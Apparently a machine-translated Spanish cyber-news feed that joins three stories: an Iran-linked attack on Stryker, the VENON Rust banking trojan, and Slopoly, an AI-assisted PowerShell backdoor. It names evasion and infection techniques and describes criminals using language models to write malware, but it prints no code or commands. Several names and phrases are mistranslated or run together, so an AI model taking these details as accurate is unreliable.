Aún así, “fue un ataque de mucho mayor perfil de lo que esperábamos de Handala”, dijo Shykevich. «Desafortunadamente, se puede definir como un éxito relativamente grande para ellos».

Ha habido informes de otras actividades cibernéticas que podrían estar relacionadas con el conflicto. Albania dijo el sistema de correo electrónico de su parlamento había sido atacado, y los piratas informáticos iraníes se habían atribuido el mérito. Estaba el orientación de cámaras de infraestructura vinculada a Irán en países a los que Irán luego lanzó misiles. Polonia dijo que era mirando hacia si Irán estuvo detrás de un intento de ciberataque a una instalación de investigación nuclear.

Algunas de las afirmaciones no coinciden con la realidad. «Hay muchos grupos hacktivistas que son muy activos en Telegram, pero en realidad no tienen ningún éxito significativo», dijo Shykevich.

También hay otros acontecimientos relacionados con la cibernética en el conflicto, como el espionajela proliferación de desinformación impulsada por la inteligencia artificial y la posibilidad de que Rusia o China ayudando en el ciberespacio en nombre de Irán, incluso si algunos expertos dudan de la probabilidad de que esto último ocurra.

Aún no está claro qué tan efectivo ha sido todo esto. Stryker, por ejemplo, dijo el ataque afectó principalmente a sus redes internas, aunque había señales También podría estar afectando las comunicaciones en los hospitales.

Pero el daño podría no venir al caso. Orleans dijo que los ataques podrían ser de naturaleza psicológica, destinados a producir miedo en el extranjero y afirmar la posición de los piratas informáticos ante los líderes nacionales en Irán durante el conflicto.

Incluso la desfiguración de bajo nivel o los ataques distribuidos de denegación de servicio pueden influir.

“Llegar al trabajo y encontrar una bandera iraní en su estación de trabajo sería un poco desconcertante, porque le hacen saber que 'puedo extender la mano y tocarlo'”, dijo Sarah Cleveland, directora senior de estrategia federal en ExtraHop y ex oficial cibernética de la Fuerza Aérea de EE. UU.

Posibles impactos posteriores

Si bien se la conoce principalmente como una empresa de suministros médicos, Stryker ha recibido contratos importantes con el ejército para equipos hospitalarios y suministros quirúrgicos, por ejemplo. No está claro si los piratas informáticos pretendían utilizar la conexión militar de Stryker para explotar los sistemas gubernamentales.

El Pentágono tiene advertido durante mucho tiempo de ciberataques cada vez mayores y complejos contra la base industrial de defensa, una vasta red de empresas -con niveles dispares de ciberseguridad- de las que depende el ejército para obtener desde armamento avanzado hasta camillas básicas. El DIB es a menudo visto por los adversarios como puerta trasera a los sistemas militares.

Si bien no abordó directamente el hackeo de Stryker, el principal asesor cibernético del Ejército, Brandon Pugh, describió algunos de los desafíos que enfrenta el DIB y la parte del servicio al tratar de protegerlo durante un seminario web el jueves en respuesta a una pregunta sobre el tema.

Dijo que los adversarios, «con razón o sin ella», ven a las empresas «como una extensión del ejército» y creen que un ataque a la industria privada tendría un impacto secundario en las fuerzas armadas.

«Algunas son empresas multinacionales muy grandes y sofisticadas», dijo, señalando que las necesidades de seguridad en todo el DIB no son universales. «Otras son empresas muy pequeñas que tienen suerte de tener un director de TI, y mucho menos un equipo cibernético sofisticado, y creo que ahí es donde es realmente importante apoyarse».

Pugh dijo que agencias de todo el gobierno federal han estado trabajando con el DIB para aumentar su resistencia a los ataques, y que el esfuerzo cibernético del Ejército enfatiza afianzar la ciberseguridad desde el comienzo del proceso de adquisición.

«Lo cibernético no puede ser una ocurrencia tardía, no digo que lo sea», añadió Pugh. “Yo diría que el Ejército hace un gran trabajo aquí, pero asegurándose de que nunca se olvide y siempre se lo considere de esa manera”.

Matt Tait, director ejecutivo y presidente de MANTECH, dijo en respuesta a una pregunta sobre el ataque Stryker y las protecciones DIB que defenderse contra tales incidentes incluye aprovechar los acuerdos y el acceso gubernamentales, como con la NSA, y compartir información rápidamente después de un ataque.

«Para mí, se trata de compartir información en tiempo real», dijo. “Cuando te atacan, necesitas compartir información en tiempo real para poder compartir esa información con el resto de la industria, así como con el gobierno, porque ellos pueden compartir esa información entre” entidades federales de ciberseguridad.

«Si quieres realizar un trabajo tecnológico centrado en una misión, este es el mundo en el que tienes que vivir y deberías compartir esta información en tiempo real», añadió. «24 horas después, 48 ​​horas después, llamo a esa ambulancia que me persigue. Eso es demasiado posterior al hecho desde una perspectiva cibernética».

Investigadores de ciberseguridad han revelado detalles de un nuevo malware bancario dirigido a usuarios brasileños que está escrito en Rust, lo que marca una desviación significativa de otras familias de malware conocidas basadas en Delphi asociadas con el ecosistema de cibercrimen latinoamericano.

El malware, que está diseñado para infectar sistemas Windows y fue descubierto por primera vez el mes pasado, lleva el nombre en código VENENO por la empresa brasileña de ciberseguridad ZenoX.

Lo que hace que VENON sea notable es que comparte comportamientos que son consistentes con los troyanos bancarios establecidos que apuntan a la región, como Grandoreiro, Mekotio y Coyote, específicamente cuando se trata de características como lógica de superposición bancaria, monitoreo activo de ventanas y un mecanismo de secuestro de acceso directo (LNK).

El malware no se ha atribuido a ningún grupo o campaña documentado previamente. Sin embargo, se descubrió que una versión anterior del artefacto, que data de enero de 2026, expone rutas completas del entorno de desarrollo del autor del malware. Las rutas hacen referencia repetidamente a un nombre de usuario de máquina Windows «byst4» (por ejemplo, «C:\Users\byst4\…»).

«La estructura del código de Rust presenta patrones que sugieren un desarrollador familiarizado con las capacidades de los troyanos bancarios existentes en América Latina, pero que utilizó IA generativa para reescribir y expandir estas funcionalidades en Rust, un lenguaje que requiere una experiencia técnica significativa para usarlo con el nivel de sofisticación observado», ZenoX dicho.

VENON se distribuye mediante una sofisticada cadena de infección que utiliza la carga lateral de DLL para iniciar una DLL maliciosa. Se sospecha que la campaña aprovecha estrategias de ingeniería social como ClickFix para engañar a los usuarios para que descarguen un archivo ZIP que contiene las cargas útiles mediante un script de PowerShell.

Una vez que se ejecuta la DLL, realiza nueve técnicas de evasión, incluidas comprobaciones anti-sandbox, llamadas al sistema indirectas, omisión de ETW y omisión de AMSI, antes de iniciar cualquier acción maliciosa. También accede a una URL de Google Cloud Storage para recuperar una configuración, instalar una tarea programada y establecer una conexión WebSocket con el servidor de comando y control (C2).

También se extraen de la DLL dos bloques de Visual Basic Script que implementan un mecanismo de secuestro de accesos directos dirigido exclusivamente a la aplicación bancaria Itaú. Los componentes funcionan reemplazando los accesos directos legítimos del sistema con versiones manipuladas que redirigen a la víctima a una página web bajo el control del actor de la amenaza.

El ataque también admite un paso de desinstalación para deshacer las modificaciones, lo que sugiere que el operador puede controlar remotamente la operación para restaurar los accesos directos a lo que eran originalmente para cubrir las pistas.

En total, el malware bancario está equipado para apuntar a 33 instituciones financieras y plataformas de activos digitales al monitorear el título de la ventana y el dominio activo del navegador, y entra en acción solo cuando cualquiera de las aplicaciones o sitios web objetivo se abre para facilitar el robo de credenciales al ofrecer superposiciones falsas.

La divulgación se produce en medio de campañas en las que actores de amenazas están explotando la ubicuidad de WhatsApp en Brasil para distribuir un gusano llamado SORVEPOTEL a través de la versión web de escritorio de la plataforma de mensajería. El ataque se basa en el abuso de chats previamente autenticados para entregar señuelos maliciosos directamente a las víctimas, lo que en última instancia resulta en la implementación de malware bancario como Maverick, Casbaneiro o Astaroth.

«Un solo mensaje de WhatsApp entregado a través de una sesión de SORVEPOTEL secuestrada fue suficiente para atraer a la víctima a una cadena de varias etapas que finalmente resultó en que un implante de Astaroth se ejecutara completamente en la memoria», Blackpoint Cyber dicho.

«La combinación de herramientas de automatización local, controladores de navegador no supervisados ​​y tiempos de ejecución modificables por el usuario crearon un entorno inusualmente permisivo, permitiendo que tanto el gusano como la carga útil final se establecieran con una fricción mínima».

Investigadores de ciberseguridad han revelado detalles de un presunto malware generado por inteligencia artificial (IA) con nombre en código Slopoly puesto en uso por un actor de amenazas motivado financieramente llamado colmena0163.

«Aunque todavía no es nada espectacular, el malware generado por IA como Slopoly muestra con qué facilidad los actores de amenazas pueden utilizar la IA como arma para desarrollar nuevos marcos de malware en una fracción del tiempo que solía llevar», Golo Mühr, investigador de IBM X-Force dicho en un informe compartido con The Hacker News.

Las operaciones de Hive0163 están impulsadas por la extorsión mediante exfiltración de datos a gran escala y ransomware. El grupo de delitos electrónicos está asociado principalmente con una amplia gama de herramientas maliciosas, incluidas NodeSnake, Interlock RAT, JunkFiction Loader y Interlock ransomware.

En un ataque de ransomware observado por la empresa a principios de 2026, se observó que el actor de amenazas implementaba Slopoly durante la fase posterior a la explotación para mantener el acceso persistente al servidor comprometido durante más de una semana.

El descubrimiento de Slopoly se remonta a un script de PowerShell que probablemente se implementó mediante un constructor, que también estableció la persistencia a través de una tarea programada llamada «Runtime Broker».

Hay indicios de que el malware se desarrolló con la ayuda de un modelo de lenguaje grande (LLM) aún indeterminado. Esto incluye la presencia de comentarios extensos, registros, manejo de errores y variables con nombres precisos. Los comentarios también describen el script como un «Cliente de persistencia C2 polimórfico», lo que indica que es parte de un marco de comando y control (C2).

«Sin embargo, el script no posee técnicas avanzadas y difícilmente puede considerarse polimórfico, ya que no puede modificar su propio código durante la ejecución», señala Mühr. «Sin embargo, el creador puede generar nuevos clientes con diferentes valores de configuración aleatorios y nombres de funciones, lo cual es una práctica estándar entre los creadores de malware».

El script de PowerShell funciona como una puerta trasera completa que puede enviar un mensaje de latido que contiene información del sistema a un servidor C2 cada 30 segundos, sondear un nuevo comando cada 50 segundos, ejecutarlo a través de «cmd.exe» y transmitir los resultados al servidor. Actualmente se desconoce la naturaleza exacta de los comandos ejecutados en la red comprometida.

Se dice que el ataque en sí aprovechó la táctica de ingeniería social ClickFix para engañar a una víctima para que ejecute un comando de PowerShell, que luego descarga NodeSnake, un conocido malware atribuido a Hive0163. Un componente de primera etapa, NodeSnake, está diseñado para ejecutar comandos de shell, establecer persistencia y recuperar y lanzar un marco de malware más amplio conocido como Interlock RAT.

Hive0163 tiene un historial de empleo de ClickFix y publicidad maliciosa para el acceso inicial. Otro método que utiliza el actor de amenazas para establecerse es confiar en corredores de acceso inicial como TA569 (también conocido como SocGholish) y TAG-124 (también conocido como KongTuke y LandUpdate808).

El marco tiene múltiples implementaciones en PowerShell, PHP, C/C++, Java y JavaScript para admitir tanto Windows como Linux. Al igual que NodeSnake, también se comunica con un servidor remoto para obtener comandos que le permitan iniciar un túnel proxy SOCKS5, generar un shell inverso en la máquina infectada y entregar más cargas útiles, como Interlock ransomware y Slopoly.

La aparición de Slopoly se suma a una lista cada vez mayor de malware asistido por IA, que también incluye VoidLink y PromptSpy, lo que pone de relieve cómo los delincuentes están utilizando la tecnología para acelerar el desarrollo de malware y escalar sus operaciones.

«La introducción de malware generado por IA no representa una amenaza nueva o sofisticada desde un punto de vista técnico», dijo IBM X-Force. «Permite desproporcionadamente a los actores de amenazas al reducir el tiempo que un operador necesita para desarrollar y ejecutar un ataque».